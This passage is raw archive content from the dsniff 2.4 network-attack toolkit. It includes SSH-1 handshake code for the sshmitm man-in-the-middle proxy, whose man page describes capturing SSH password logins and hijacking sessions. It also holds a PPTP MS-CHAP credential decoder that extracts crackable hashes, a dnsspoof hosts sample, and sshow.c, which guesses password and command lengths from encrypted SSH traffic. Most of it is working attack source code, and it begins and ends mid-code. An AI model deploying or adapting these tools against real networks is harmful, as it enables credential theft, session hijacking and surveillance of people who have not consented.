ctx->encmask = ((1 << SSH_CIPHER_3DES) | (1 << SSH_CIPHER_BLOWFISH) | (1 << SSH_CIPHER_NONE)); return (ctx); } SSH * SSH_new(SSH_CTX *ctx) { SSH *ssh; if ((ssh = calloc(sizeof(*ssh), 1)) == NULL) return (NULL); ssh->fd = -1; ssh->ctx = ctx; return (ssh); } void SSH_set_fd(SSH *ssh, int fd) { ssh->fd = fd; } #define SKIP(p, i, l) { (p) += (l); if (((i) -= (l)) < 0) return (-1); } int SSH_accept(SSH *ssh) { BIGNUM *enckey; u_char *p, cipher, cookie[8], msg[1024]; u_int32_t num; int i; /* Generate anti-spoofing cookie. */ RAND_bytes(cookie, sizeof(cookie)); /* Send public key. */ p = msg; *p++ = SSH_SMSG_PUBLIC_KEY; /* type */ memcpy(p, cookie, 8); p += 8; /* cookie */ num = 768; PUTLONG(num, p); /* servkey bits */ put_bn(ssh->ctx->servkey->e, &p); /* servkey exponent */ put_bn(ssh->ctx->servkey->n, &p); /* servkey modulus */ num = 1024; PUTLONG(num, p); /* hostkey bits */ put_bn(ssh->ctx->hostkey->e, &p); /* hostkey exponent */ put_bn(ssh->ctx->hostkey->n, &p); /* hostkey modulus */ num = 0; PUTLONG(num, p); /* protocol flags */ num = ssh->ctx->encmask; PUTLONG(num, p); /* ciphers */ num = ssh->ctx->authmask; PUTLONG(num, p); /* authmask */ if (SSH_send(ssh, msg, p - msg) < 0) { warn("SSH_send"); return (-1); } /* Receive session key. */ if ((i = SSH_recv(ssh, pkt, sizeof(pkt))) <= 0) { warn("SSH_recv"); return (-1); } p = pkt; /* Verify type. */ if (p[0] != SSH_CMSG_SESSION_KEY) { warnx("expected packet type %d, got %d", SSH_CMSG_SESSION_KEY, pkt[0]); return (-1); } SKIP(p, i, 1); /* Verify cipher. */ cipher = p[0]; if (cipher != SSH_CIPHER_NONE && (ssh->ctx->encmask & (1 << cipher)) == 0) { warnx("cipher type %d not supported", cipher); return (-1); } SKIP(p, i, 1); /* Verify cookie. */ if (memcmp(p, cookie, 8) != 0) { warnx("cookie doesn't match"); return (-1); } SKIP(p, i, 8); /* Get encrypted session key. */ if ((enckey = BN_new()) == NULL) { warn("BN_new"); return (-1); } get_bn(enckey, &p, &i); /* Skip protocol flags. */ SKIP(p, i, 4); /* Decrypt session key. */ if (BN_cmp(ssh->ctx->servkey->n, ssh->ctx->hostkey->n) > 0) { rsa_private_decrypt(enckey, enckey, ssh->ctx->servkey); rsa_private_decrypt(enckey, enckey, ssh->ctx->hostkey); } else { rsa_private_decrypt(enckey, enckey, ssh->ctx->hostkey); rsa_private_decrypt(enckey, enckey, ssh->ctx->servkey); } BN_mask_bits(enckey, sizeof(ssh->sesskey) * 8); i = BN_num_bytes(enckey); if (i < 0 || i > sizeof(ssh->sesskey)) { warnx("session key bogus"); return (-1); } memset(ssh->sesskey, 0, sizeof(ssh->sesskey)); BN_bn2bin(enckey, ssh->sesskey + sizeof(ssh->sesskey) - i); BN_clear_free(enckey); /* Derive real session key using session id. */ if ((p = ssh_session_id(cookie, ssh->ctx->hostkey->n, ssh->ctx->servkey->n)) == NULL) { warn("ssh_session_id"); return (-1); } for (i = 0; i < 16; i++) { ssh->sesskey[i] ^= p[i]; } /* Set cipher. */ if (cipher == SSH_CIPHER_3DES) { ssh->estate = des3_init(ssh->sesskey, sizeof(ssh->sesskey)); ssh->dstate = des3_init(ssh->sesskey, sizeof(ssh->sesskey)); ssh->encrypt = des3_encrypt; ssh->decrypt = des3_decrypt; } else if (cipher == SSH_CIPHER_BLOWFISH) { ssh->estate = blowfish_init(ssh->sesskey,sizeof(ssh->sesskey)); ssh->dstate = blowfish_init(ssh->sesskey,sizeof(ssh->sesskey)); ssh->encrypt = blowfish_encrypt; ssh->decrypt = blowfish_decrypt; } /* Send verification. */ msg[0] = SSH_SMSG_SUCCESS; if (SSH_send(ssh, msg, 1) == -1) { warn("SSH_send"); return (-1); } return (0); } int SSH_connect(SSH *ssh) { BIGNUM *bn; u_char *p, cipher, cookie[8], msg[1024]; u_int32_t num; int i; /* Get public key. */ if ((i = SSH_recv(ssh, pkt, sizeof(pkt))) <= 0) { warn("SSH_recv"); return (-1); } p = pkt; /* Verify type. */ if (p[0] != SSH_SMSG_PUBLIC_KEY) { warnx("expected packet type %d, got %d", SSH_SMSG_PUBLIC_KEY, p[0]); return (-1); } SKIP(p, i, 1); /* Get cookie. */ if (i > 8) memcpy(cookie, p, 8); SKIP(p, i, 8); /* Get servkey. */ ssh->ctx->servkey = RSA_new(); ssh->ctx->servkey->n = BN_new(); ssh->ctx->servkey->e = BN_new(); SKIP(p, i, 4); get_bn(ssh->ctx->servkey->e, &p, &i); get_bn(ssh->ctx->servkey->n, &p, &i); /* Get hostkey. */ ssh->ctx->hostkey = RSA_new(); ssh->ctx->hostkey->n = BN_new(); ssh->ctx->hostkey->e = BN_new(); SKIP(p, i, 4); get_bn(ssh->ctx->hostkey->e, &p, &i); get_bn(ssh->ctx->hostkey->n, &p, &i); /* Get cipher, auth masks. */ SKIP(p, i, 4); if (i < 8) return (-1); GETLONG(ssh->ctx->encmask, p); GETLONG(ssh->ctx->authmask, p); /* Generate session key. */ RAND_bytes(ssh->sesskey, sizeof(ssh->sesskey)); /* Obfuscate with session id. */ if ((p = ssh_session_id(cookie, ssh->ctx->hostkey->n, ssh->ctx->servkey->n)) == NULL) { warn("ssh_session_id"); return (-1); } if ((bn = BN_new()) == NULL) { warn("BN_new"); return (-1); } BN_set_word(bn, 0); for (i = 0; i < sizeof(ssh->sesskey); i++) { BN_lshift(bn, bn, 8); if (i < 16) BN_add_word(bn, ssh->sesskey[i] ^ p[i]); else BN_add_word(bn, ssh->sesskey[i]); } /* Encrypt session key. */ if (BN_cmp(ssh->ctx->servkey->n, ssh->ctx->hostkey->n) < 0) { rsa_public_encrypt(bn, bn, ssh->ctx->servkey); rsa_public_encrypt(bn, bn, ssh->ctx->hostkey); } else { rsa_public_encrypt(bn, bn, ssh->ctx->hostkey); rsa_public_encrypt(bn, bn, ssh->ctx->servkey); } RSA_free(ssh->ctx->servkey); RSA_free(ssh->ctx->hostkey); /* Verify auth and cipher type. */ if ((ssh->ctx->authmask & (1 << SSH_AUTH_PASSWORD)) == 0) { warnx("password auth not supported!"); return (-1); } if ((ssh->ctx->encmask & (1 << SSH_CIPHER_BLOWFISH))) { cipher = SSH_CIPHER_BLOWFISH; } else if ((ssh->ctx->encmask & (1 << SSH_CIPHER_3DES))) { cipher = SSH_CIPHER_3DES; } else { warnx("no supported cipher"); return (-1); } /* Send SSH_CMSG_SESSION_KEY. */ p = msg; *p++ = SSH_CMSG_SESSION_KEY; /* type */ *p++ = cipher; /* cipher type */ memcpy(p, cookie, 8); p += 8; /* cookie */ put_bn(bn, &p); /* enc sesskey */ num = 0; PUTLONG(num, p); /* flags */ BN_clear_free(bn); if (SSH_send(ssh, msg, p - msg) < 0) { warn("SSH_send"); return (-1); } /* Set cipher. */ if (cipher == SSH_CIPHER_BLOWFISH) { ssh->estate = blowfish_init(ssh->sesskey,sizeof(ssh->sesskey)); ssh->dstate = blowfish_init(ssh->sesskey,sizeof(ssh->sesskey)); ssh->encrypt = blowfish_encrypt; ssh->decrypt = blowfish_decrypt; } else if (cipher == SSH_CIPHER_3DES) { ssh->estate = des3_init(ssh->sesskey, sizeof(ssh->sesskey)); ssh->dstate = des3_init(ssh->sesskey, sizeof(ssh->sesskey)); ssh->encrypt = des3_encrypt; ssh->decrypt = des3_decrypt; } /* Get server response. */ if ((i = SSH_recv(ssh, pkt, sizeof(pkt))) <= 0) { warn("SSH_recv"); return (-1); } if (i < 1 || pkt[0] != SSH_SMSG_SUCCESS) { warnx("server rejected us"); return (-1); } return (0); } int SSH_recv(SSH *ssh, u_char *buf, int size) { u_int32_t i, crc, len; u_char *p; /* Read length. */ if (atomicio(read, ssh->fd, &len, sizeof(len)) != sizeof(len)) { return (-1); } len = ntohl(len); i = 8 - (len % 8); if (i + len > size) { errno = EINVAL; return (-1); } /* Read padding + data + crc. */ if (atomicio(read, ssh->fd, buf, i + len) != i + len) return (-1); /* Decrypt payload. */ if (ssh->decrypt != NULL) { ssh->decrypt(buf, buf, i + len, ssh->dstate); } /* Verify CRC. */ len -= 4; p = buf + i + len; GETLONG(crc, p); if (ssh_crc32(buf, i + len) != crc) { warnx("check bytes corrupted on input"); errno = EINVAL; return (-1); } /* Skip padding. */ memmove(buf, buf + i, len); if (Opt_debug) { hex_print(buf, len, 0); } return (len); } int SSH_send(SSH *ssh, u_char *buf, int len) { u_char *p; u_int32_t i; if (len > SSH_MAX_PKTLEN) { errno = EMSGSIZE; return (-1); } p = pkt; /* Add length (msg + crc). */ i = len + 4; PUTLONG(i, p); /* Add padding. */ i = 8 - ((len + 4) % 8); if (ssh->encrypt != NULL) { RAND_bytes(p, i); } else memset(p, 0, i); p += i; /* Add data. */ memmove(p, buf, len); p += len; /* Add CRC. */ i = ssh_crc32(pkt + 4, (p - pkt) - 4); PUTLONG(i, p); i = p - pkt; /* Encrypt payload. */ if (ssh->encrypt != NULL) { ssh->encrypt(pkt + 4, pkt + 4, i - 4, ssh->estate); } /* Send it. */ if (atomicio(write, ssh->fd, pkt, i) != i) return (-1); return (len); } void SSH_close(SSH *ssh) { close(ssh->fd); } dsniff-2.4/sshcrypto.h0000600000175000017500000000154507254077102014706 0ustar lucianoluciano/* * sshcrypto.c * * SSH-1 crypto routines, adapted from OpenSSH. * * Copyright (c) 2000 Dug Song * Copyright (c) 2000 Niels Provos * Copyright (c) 2000 Markus Friedl * * $Id: sshcrypto.h,v 1.3 2001/03/15 08:33:06 dugsong Exp $ */ #ifndef SSHCRYPTO_H #define SSHCRYPTO_H void rsa_public_encrypt(BIGNUM *src, BIGNUM *dst, RSA *key); void rsa_private_decrypt(BIGNUM *src, BIGNUM *dst, RSA *key); void *blowfish_init(u_char *sesskey, int len); void blowfish_encrypt(u_char *src, u_char *dst, int len, void *state); void blowfish_decrypt(u_char *src, u_char *dst, int len, void *state); void *des3_init(u_char *sesskey, int len); void des3_encrypt(u_char *src, u_char *dst, int len, void *state); void des3_decrypt(u_char *src, u_char *dst, int len, void *state); #endif /* SSHCRYPTO_H */ dsniff-2.4/sshmitm.80000600000175000017500000000147107216321052014244 0ustar lucianoluciano.TH SSHMITM 8 .ad .fi .SH NAME sshmitm \- SSH monkey-in-the-middle .SH SYNOPSIS .na .nf .fi \fBsshmitm\fR [\fB-d\fR] [\fB-I\fR] [\fB-p \fIport\fR] host [\fIport\fR] .SH DESCRIPTION .ad .fi \fBsshmitm\fR proxies and sniffs SSH traffic redirected by dnsspoof(8), capturing SSH password logins, and optionally hijacking interactive sessions. Only SSH protocol version 1 is (or ever will be) supported - this program is far too evil already. .SH OPTIONS .IP \fB-d\fR Enable verbose debugging output. .IP \fB-I\fR Monitor / hijack an interactive session. .IP "\fB-p \fIport\fR" Specify the local port to listen on. .IP \fIhost\fR Specify the remote host to relay connections to. .IP \fIport\fR Specify the remote port to relay connections to. .SH "SEE ALSO" dsniff(8), dnsspoof(8) .SH AUTHOR .na .nf Dug Song dsniff-2.4/decode_pptp.c0000600000175000017500000001146607254077076015146 0ustar lucianoluciano/* * decode_pptp.c * * Microsoft PPTP MS-CHAP. Derived from Aleph One's anger.c. * * Copyright (c) 2000 Dug Song * Copyright (c) 2000 Aleph One * * $Id: decode_pptp.c,v 1.4 2001/03/15 08:33:02 dugsong Exp $ */ #include "config.h" #include #include #include #include #include "buf.h" #include "decode.h" struct pptp_gre_header { u_char flags; /* bitfield */ u_char ver; /* should be PPTP_GRE_VER (enhanced GRE) */ u_short protocol; /* should be PPTP_GRE_PROTO (ppp-encaps) */ u_short payload_len; /* size of ppp payload, not inc. gre header */ u_short call_id; /* peer's call_id for this session */ u_int32_t seq; /* sequence number. Present if S==1 */ u_int32_t ack; /* seq number of highest packet recieved by */ /* sender in this session */ }; #define PPTP_GRE_PROTO 0x880B #define PPTP_GRE_VER 0x1 #define PPTP_GRE_IS_C(f) ((f) & 0x80) #define PPTP_GRE_IS_R(f) ((f) & 0x40) #define PPTP_GRE_IS_K(f) ((f) & 0x20) #define PPTP_GRE_IS_S(f) ((f) & 0x10) #define PPTP_GRE_IS_A(f) ((f) & 0x80) struct ppp_header { u_char address; u_char control; u_short proto; }; #define PPP_PROTO_CHAP 0xc223 struct ppp_lcp_chap_header { u_char code; u_char ident; u_short length; }; #define PPP_CHAP_CODE_CHALLENGE 1 #define PPP_CHAP_CODE_RESPONSE 2 struct ppp_chap_challenge { u_char size; union { u_char challenge_v1[8]; u_char challenge_v2[16]; struct { u_char lanman[24]; u_char nt[24]; u_char flag; } response_v1; struct { u_char peer_challenge[16]; u_char reserved[8]; u_char nt[24]; u_char flag; } response_v2; } value; /* name */ }; struct challenge { u_char version; u_char challenge[16]; }; int decode_pptp(u_char *buf, int len, u_char *obuf, int olen) { static struct challenge save_challenge; struct buf outbuf; struct pptp_gre_header *pgh; struct ppp_header *ppp; struct ppp_lcp_chap_header *chap; struct ppp_chap_challenge *chapch; u_short proto; u_char *p, name[64], digest[SHA_DIGEST_LENGTH]; SHA_CTX ctx; int i, pghlen; buf_init(&outbuf, obuf, olen); if (len < (pghlen = sizeof(*pgh))) return (0); pgh = (struct pptp_gre_header *)buf; if ((pgh->ver & 0x7f) != PPTP_GRE_VER || ntohs(pgh->protocol) != PPTP_GRE_PROTO || PPTP_GRE_IS_C(pgh->flags) || PPTP_GRE_IS_R(pgh->flags) || PPTP_GRE_IS_K(pgh->flags) == 0 || (pgh->flags & 0xf) != 0) { return (0); } if (PPTP_GRE_IS_S(pgh->flags) == 0) return (0); if (PPTP_GRE_IS_A(pgh->ver) == 0) pghlen -= sizeof(pgh->ack); if (len - pghlen < ntohs(pgh->payload_len)) return (0); ppp = (struct ppp_header *)(pgh + 1); if (ppp->address != 0xff && ppp->control != 0x3) { proto = pntohs(ppp); chap = (struct ppp_lcp_chap_header *) ((u_char *)ppp + sizeof(proto)); } else { proto = ntohs(ppp->proto); chap = (struct ppp_lcp_chap_header *)(ppp + 1); } if (proto != PPP_PROTO_CHAP) return (0); switch (chap->code) { case PPP_CHAP_CODE_CHALLENGE: chapch = (struct ppp_chap_challenge *)(chap + 1); if (chapch->size == 8) { save_challenge.version = 1; memcpy(save_challenge.challenge, chapch->value.challenge_v1, 8); } else if (chapch->size == 16) { save_challenge.version = 2; memcpy(save_challenge.challenge, chapch->value.challenge_v2, 16); } else save_challenge.version = 0; break; case PPP_CHAP_CODE_RESPONSE: if (save_challenge.version == 0) break; chapch = (struct ppp_chap_challenge *)(chap + 1); i = ntohs(chap->length) - 54; if (i > 63) i = 63; memcpy(name, (u_char *)chap + 54, i); name[i] = '\0'; buf_putf(&outbuf, "%s:0:", name); if (save_challenge.version == 1) { for (i = 0; i < 8; i++) { buf_putf(&outbuf, "%02X", save_challenge.challenge[i]); } buf_put(&outbuf, ":", 1); for (i = 0; i < 24; i++) { buf_putf(&outbuf, "%02X", chapch->value.response_v1.lanman[i]); } buf_put(&outbuf, ":", 1); for (i = 0; i < 24; i++) { buf_putf(&outbuf, "%02X", chapch->value.response_v1.nt[i]); } buf_put(&outbuf, "\n", 1); } else if (save_challenge.version == 2) { chapch = (struct ppp_chap_challenge *)(chap + 1); if ((p = strchr(name, '\\')) == NULL) p = name; SHA1_Init(&ctx); SHA1_Update(&ctx, chapch->value.response_v2.peer_challenge, 16); SHA1_Update(&ctx, save_challenge.challenge, 16); SHA1_Update(&ctx, p, strlen(p)); SHA1_Final(digest, &ctx); for (i = 0; i < 8; i++) { buf_putf(&outbuf, "%02X", digest[i]); } buf_putf(&outbuf, ":000000000000000000000000000000000000000000000000:"); for (i = 0; i < 24; i++) { buf_putf(&outbuf, "%02X", chapch->value.response_v2.nt[i]); } buf_put(&outbuf, "\n", 1); save_challenge.version = 0; } break; } buf_end(&outbuf); return (buf_len(&outbuf)); } dsniff-2.4/dnsspoof.hosts0000600000175000017500000000216007206044036015403 0ustar lucianoluciano# $Id: dnsspoof.hosts,v 1.2 2000/08/28 13:28:21 dugsong Exp $ # # Sample hosts file for dnsspoof - kill web banner ads for Niels. :-) # 127.0.0.1 ad.* 127.0.0.1 ads*.* 127.0.0.1 adbot*.* 127.0.0.1 adcount*.* 127.0.0.1 adfinity*.* 127.0.0.1 adforce*.* 127.0.0.1 adimage*.* 127.0.0.1 adlink*.* 127.0.0.1 adserv*.* 127.0.0.1 adremote*.* 127.0.0.1 adv.* 127.0.0.1 advert*.* 127.0.0.1 banner*.* 127.0.0.1 count*.* 127.0.0.1 promo*.* 127.0.0.1 werbung*.* 127.0.0.1 *ads*.*.com 127.0.0.1 *.adbot.com 127.0.0.1 *.adone.com 127.0.0.1 *.adforce.com 127.0.0.1 *.ad-up.com 127.0.0.1 *.advert*.* 127.0.0.1 *.banner*.* 127.0.0.1 *.bfast.com 127.0.0.1 *.burstnet.com 127.0.0.1 *.doubleclick.net 127.0.0.1 *.focalink.com 127.0.0.1 *.flycast.com 127.0.0.1 *.freestats.com 127.0.0.1 *.hitbox.com 127.0.0.1 *.globaltrack.com 127.0.0.1 *.globaltrak.net 127.0.0.1 *.imagine-inc.com 127.0.0.1 *.imgis.com 127.0.0.1 *.link*.com 127.0.0.1 *.memory.net 127.0.0.1 *.preferences.com 127.0.0.1 *.smartclicks.com 127.0.0.1 *.sponsorpool.net 127.0.0.1 *.stats.net 127.0.0.1 *.stattrax.com 127.0.0.1 *.*tracker.com 127.0.0.1 *.valueclick.com 127.0.0.1 *.wisewire.com dsniff-2.4/sshow.c0000600000175000017500000003771707255326237014027 0ustar lucianoluciano/* * sshow.c * * Passive SSH traffic analysis. * * http://www.openwall.com/advisories/OW-003-ssh-traffic-analysis.txt * * Copyright (c) 2000-2001 Solar Designer * Copyright (c) 2000 Dug Song * * $Id: sshow.c,v 1.2 2001/03/19 06:52:15 dugsong Exp $ */ #include "config.h" #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include "pcaputil.h" #if !defined(NIDS_MAJOR) || (NIDS_MAJOR == 1 && NIDS_MINOR < 15) #error This program requires libnids 1.15+ #endif #define HISTORY_SIZE 16 typedef struct { u_int min, max; } range; typedef struct { int direction; /* 0 for client to server */ clock_t timestamp; /* timestamp of this packet */ u_int cipher_size; /* ciphertext size */ range plain_range; /* possible plaintext sizes */ } record; struct history { record packets[HISTORY_SIZE]; /* recent packets (circular list) */ int index; /* next (free) index into packets[] */ u_int directions; /* recent directions (bitmask) */ clock_t timestamps[2]; /* last timestamps in each direction */ }; struct line { int input_count; /* input packets (client to server) */ int input_size; /* input size (estimated) */ int input_last; /* last input packet size */ int echo_count; /* echo packets (server to client) */ }; struct session { int protocol; /* -1 not SSH, 0 unknown, 1 or 2 once known */ int state; /* 1 after username, 2 after authentication */ int compressed; /* whether compression is known to be used */ struct history history; /* session history */ struct line line; /* current command line */ }; static int debug = 0; static clock_t now; static void usage(void) { fprintf(stderr, "Usage: sshow [-d] [-i interface]\n"); exit(1); } static clock_t add_history(struct session *session, int direction, u_int cipher_size, range *plain_range) { record *current; clock_t delay; current = &session->history.packets[session->history.index++]; session->history.index %= HISTORY_SIZE; current->direction = direction; current->timestamp = now; current->cipher_size = cipher_size; current->plain_range = *plain_range; session->history.directions <<= 1; session->history.directions |= direction; delay = now - session->history.timestamps[direction]; session->history.timestamps[direction] = now; return (delay); } static record * get_history(struct session *session, int age) { int index; index = session->history.index + (HISTORY_SIZE - 1) - age; index %= HISTORY_SIZE; return (&session->history.packets[index]); } static char * s_saddr(struct tcp_stream *ts) { static char output[32]; snprintf(output, sizeof(output), "%s:%u", inet_ntoa(*((struct in_addr *)&ts->addr.saddr)), ts->addr.source); return (output); } static char * s_daddr(struct tcp_stream *ts) { static char output[32]; snprintf(output, sizeof(output), "%s:%u", inet_ntoa(*((struct in_addr *)&ts->addr.daddr)), ts->addr.dest); return (output); } static char * s_range(range *range) { static char output[32]; snprintf(output, sizeof(output), range->min == range->max ? "%u" : "%u to %u", range->min, range->max); return (output); } static void print_data(struct half_stream *stream, u_int count) { u_int i; int printable; printable = 1; for (i = 0; i < count; i++) { printf("%02x%c", (int)(u_char)stream->data[i], i < count - 1 && i % 24 != 23 ? ' ' : '\n'); printable &= isprint(stream->data[i]) || stream->data[i] == '\n'; } if (printable && count >= 4 && !memcmp(stream->data, "SSH-", 4)) fwrite(stream->data, count, 1, stdout); } static u_int ssh1_plain_size(struct half_stream *stream) { if (stream->count_new < 4) return (0); return (u_int)(u_char)stream->data[3] | ((u_int)(u_char)stream->data[2] << 8) | ((u_int)(u_char)stream->data[1] << 16) | ((u_int)(u_char)stream->data[0] << 24); } static u_int ssh1_cipher_size(struct half_stream *stream) { return (4 + ((ssh1_plain_size(stream) + 8) & ~7)); } static range * ssh1_plain_range(struct half_stream *stream) { static range output; output.min = output.max = ssh1_plain_size(stream) - 5; return (&output); } static range * ssh2_plain_range(struct half_stream *stream) { static range output; output.max = stream->count_new - 16; /* Assume min padding + 8-byte cipher blocksize */ output.min = output.max - 7; if ((int)output.min < 0) output.min = 0; return (&output); } static void client_to_server(struct tcp_stream *ts, struct session *session, u_int cipher_size, range *plain_range) { clock_t delay; int payload; delay = add_history(session, 0, cipher_size, plain_range); if (debug) printf("- %s -> %s: DATA (%s bytes, %.2f seconds)\n", s_saddr(ts), s_daddr(ts), s_range(plain_range), (float)delay / CLK_TCK); if (debug > 1) print_data(&ts->server, cipher_size); payload = plain_range->min; if (session->state == 2 && payload > 0) { session->line.input_count++; session->line.input_last = payload; if (session->protocol == 1) payload -= 4; else { payload -= 20 + 1; /* Assume several SSH-2 packets in this IP packet */ if (payload % 44 == 0) { session->line.input_count += payload / 44; /* One character per SSH-2 packet (typical) */ payload += payload / 44; payload %= 44; } payload++; } if (payload <= 0) { if (payload < 0 && !session->compressed && session->protocol == 1) { session->compressed = 1; printf("+ %s -> %s: Compression detected, " "guesses will be much less reliable\n", s_saddr(ts), s_daddr(ts)); } payload = 1; } session->line.input_size += payload; } } static void server_to_client(struct tcp_stream *ts, struct session *session, u_int cipher_size, range *plain_range) { clock_t delay; int skip; range string_range; delay = add_history(session, 1, cipher_size, plain_range); if (debug) printf("- %s <- %s: DATA (%s bytes, %.2f seconds)\n", s_saddr(ts), s_daddr(ts), s_range(plain_range), (float)delay / CLK_TCK); if (debug > 1) print_data(&ts->client, cipher_size); /* * Some of the checks may want to skip over multiple server responses. * For example, there's a debugging packet sent for every option found * in authorized_keys, but we can't use those packets in our pattern. */ skip = 0; while (((session->history.directions >> skip) & 3) == 3) if (++skip > HISTORY_SIZE - 5) break; if (session->state == 0 && session->protocol == 1 && ((session->history.directions >> skip) & 7) == 5 && plain_range->min == 0 && get_history(session, skip + 1)->plain_range.min > 4 && get_history(session, skip + 2)->plain_range.min == 0) { session->state = 1; string_range = get_history(session, skip + 1)->plain_range; string_range.min -= 4; string_range.max -= 4; printf("+ %s -> %s: GUESS: Username length is %s\n", s_saddr(ts), s_daddr(ts), s_range(&string_range)); return; } if (session->state == 1 && #ifdef USE_TIMING now - get_history(session, 2)->timestamp >= CLK_TCK && #endif session->protocol == 1 && (session->history.directions & 7) == 5 && plain_range->min == 0 && get_history(session, 1)->plain_range.min > 4 && get_history(session, 2)->plain_range.min == 0) { session->state = 2; string_range = get_history(session, 1)->plain_range; string_range.min -= 4; string_range.max -= 4; printf("+ %s -> %s: GUESS: Password authentication, " "password length %s %s%s\n", s_saddr(ts), s_daddr(ts), string_range.min == 32 ? "appears to be" : "is", s_range(&string_range), string_range.min == 32 ? " (padded?)" : ""); } if (session->state == 0 && session->protocol == 2 && (session->history.directions & 7) == 5) { if (plain_range->min == 4 + 9) { string_range = get_history(session, 1)->plain_range; if (string_range.min > 500 && string_range.min < 600) { session->state = 2; printf("+ %s -> %s: GUESS: DSA " "authentication accepted\n", s_saddr(ts), s_daddr(ts)); } else if (string_range.min > 42 + 9) { session->state = 2; printf("+ %s -> %s: GUESS: Password " "authentication accepted\n", s_saddr(ts), s_daddr(ts)); } } else if (plain_range->min > 12 + 9 && plain_range->min < 56 + 9) { string_range = get_history(session, 1)->plain_range; if (string_range.min > 500 && string_range.min < 600) printf("+ %s -> %s: GUESS: DSA " "authentication failed\n", s_saddr(ts), s_daddr(ts)); else if (string_range.min > 42 + 9) printf("+ %s -> %s: GUESS: Password " "authentication failed\n", s_saddr(ts), s_daddr(ts)); } } if (session->state == 1 && session->protocol == 1 && (session->history.directions & 3) == 1 && plain_range->min == 0 && get_history(session, 1)->plain_range.min == 130) { printf("+ %s -> %s: GUESS: RSA authentication refused\n", s_saddr(ts), s_daddr(ts)); } if (session->state == 1 && session->protocol == 1 && skip >= 1 && ((session->history.directions >> (skip - 1)) & 037) == 013 && plain_range->min == 0 && get_history(session, skip - 1 + 2)->plain_range.min == 16 && get_history(session, skip - 1 + 3)->plain_range.min == 130 && get_history(session, skip - 1 + 4)->plain_range.min == 130) { char *what; switch (get_history(session, 1)->plain_range.min - 4) { case 28: /* "RSA authentication accepted." */ session->state = 2; if (skip > 1 && (what = alloca(64))) { snprintf(what, 64, "accepted " "(%d+ authorized_keys option%s)", skip - 1, skip - 1 == 1 ? "" : "s"); break; } what = "accepted"; break; case 47: /* "Wrong response to RSA authentication challenge." */ what = "failed"; break; default: what = "???"; } printf("+ %s -> %s: GUESS: RSA authentication %s\n", s_saddr(ts), s_daddr(ts), what); } if (session->state == 2) { session->line.echo_count++; /* Check for backspace */ if (session->protocol == 1 && !session->compressed && plain_range->min == 4 + 3 && session->line.input_size >= 2) session->line.input_size -= 2; if (plain_range->min > 4 + session->line.input_last && session->line.input_count >= 2 && session->line.input_size >= 2) { int size; char *what; size = session->line.input_size; if (session->line.echo_count + 1 >= session->line.input_count && size <= (session->line.input_count << 2) && size < 0x100) { what = "(command) line"; } else { if (session->line.echo_count <= 2 && size <= (session->line.input_count << 1) && size >= 2 + 1 && size <= 40 + 1) { what = "password"; } else what = NULL; } if (debug) { printf("- %s -> %s: sent %d packets " "(%d characters), seen %d replies\n", s_saddr(ts), s_daddr(ts), session->line.input_count, size, session->line.echo_count); } if (what) { printf("+ %s -> %s: GUESS: " "a %s of %d character%s\n", s_saddr(ts), s_daddr(ts), what, size - 1, size == 2 ? "" : "s"); } } if (plain_range->min <= 0 || plain_range->min > 4 + session->line.input_last) { session->line.input_count = 0; session->line.input_size = 0; session->line.echo_count = 0; } } } static void process_data(struct tcp_stream *ts, struct session *session) { u_int have, need; char *lf; if (session->protocol < 0) return; if (ts->client.count_new && (have = ts->client.count - ts->client.offset)) { switch (session->protocol) { case 1: if (have < (need = ssh1_cipher_size(&ts->client))) { if (debug) { printf("- %s <- %s: got %u of " "%u bytes\n", s_saddr(ts), s_daddr(ts), have, need); } nids_discard(ts, 0); return; } if (have != need && debug) { printf("- %s <- %s: left %u bytes\n", s_saddr(ts), s_daddr(ts), have - need); } nids_discard(ts, need); server_to_client(ts, session, need, ssh1_plain_range(&ts->client)); return; case 2: server_to_client(ts, session, have, ssh2_plain_range(&ts->client)); return; default: break; } } if (ts->server.count_new && (have = ts->server.count - ts->server.offset)) { if (!session->protocol) { lf = (char *)memchr(ts->server.data, '\n', have); if (have < 7 || (!lf && have < 0x100)) { nids_discard(ts, 0); return; } if (lf && !memcmp(ts->server.data, "SSH-", 4)) session->protocol = ts->server.data[4] - '0'; /* some clients announce SSH-1.99 instead of SSH-2.0 */ if (session->protocol == 1 && ts->server.data[5] == '.' && ts->server.data[6] == '9') { session->protocol = 2; } if (session->protocol != 1 && session->protocol != 2) { session->protocol = -1; if (debug) { printf("- %s -> %s: not SSH\n", s_saddr(ts), s_daddr(ts)); } return; } need = lf - ts->server.data + 1; nids_discard(ts, need); printf("+ %s -> %s: SSH protocol %d\n", s_saddr(ts), s_daddr(ts), session->protocol); if (debug) print_data(&ts->server, have); return; } switch (session->protocol) { case 1: if (have < (need = ssh1_cipher_size(&ts->server))) { if (debug) { printf("- %s -> %s: got %u of " "%u bytes\n", s_saddr(ts), s_daddr(ts), have, need); } nids_discard(ts, 0); return; } if (have != need && debug) { printf("- %s -> %s: left %u bytes\n", s_saddr(ts), s_daddr(ts), have - need); } nids_discard(ts, need); client_to_server(ts, session, need, ssh1_plain_range(&ts->server)); return; case 2: client_to_server(ts, session, have, ssh2_plain_range(&ts->server)); } } } static void process_event(struct tcp_stream *ts, struct session **session) { struct tms buf; char *what; now = times(&buf); what = NULL; switch (ts->nids_state) { case NIDS_JUST_EST: ts->client.collect = 1; ts->server.collect = 1; if (debug) { printf("- %s -> %s: ESTABLISHED\n", s_saddr(ts), s_daddr(ts)); } if (!(*session = calloc(1, sizeof(**session)))) { err(1, "calloc"); } (*session)->history.timestamps[0] = now; (*session)->history.timestamps[1] = now; return; case NIDS_CLOSE: what = "CLOSED"; case NIDS_RESET: if (!what) what = "RESET"; case NIDS_TIMED_OUT: if (!what) what = "TIMED OUT"; if ((*session)->protocol > 0) { printf("+ %s -- %s: %s\n", s_saddr(ts), s_daddr(ts), what); } else if (debug) { printf("- %s -- %s: %s\n", s_saddr(ts), s_daddr(ts), what); } free(*session); return; case NIDS_DATA: process_data(ts, *session); return; } } static void null_syslog(int type, int errnum, struct ip *iph, void *data) { } static void cleanup(int signum) { exit(0); /* Just so that atexit(3) jobs are called */ } int main(int argc, char *argv[]) { extern char *optarg; extern int optind; int c; while ((c = getopt(argc, argv, "di:h?")) != -1) { switch (c) { case 'd': debug++; break; case 'i': nids_params.device = optarg; break; default: usage(); break; } } argc -= optind; argv += optind; signal(SIGTERM, cleanup); signal(SIGINT, cleanup); signal(SIGHUP, cleanup); setlinebuf(stdout); if (argc > 0) { nids_params.pcap_filter = copy_argv(argv); } else nids_params.pcap_filter = "tcp"; 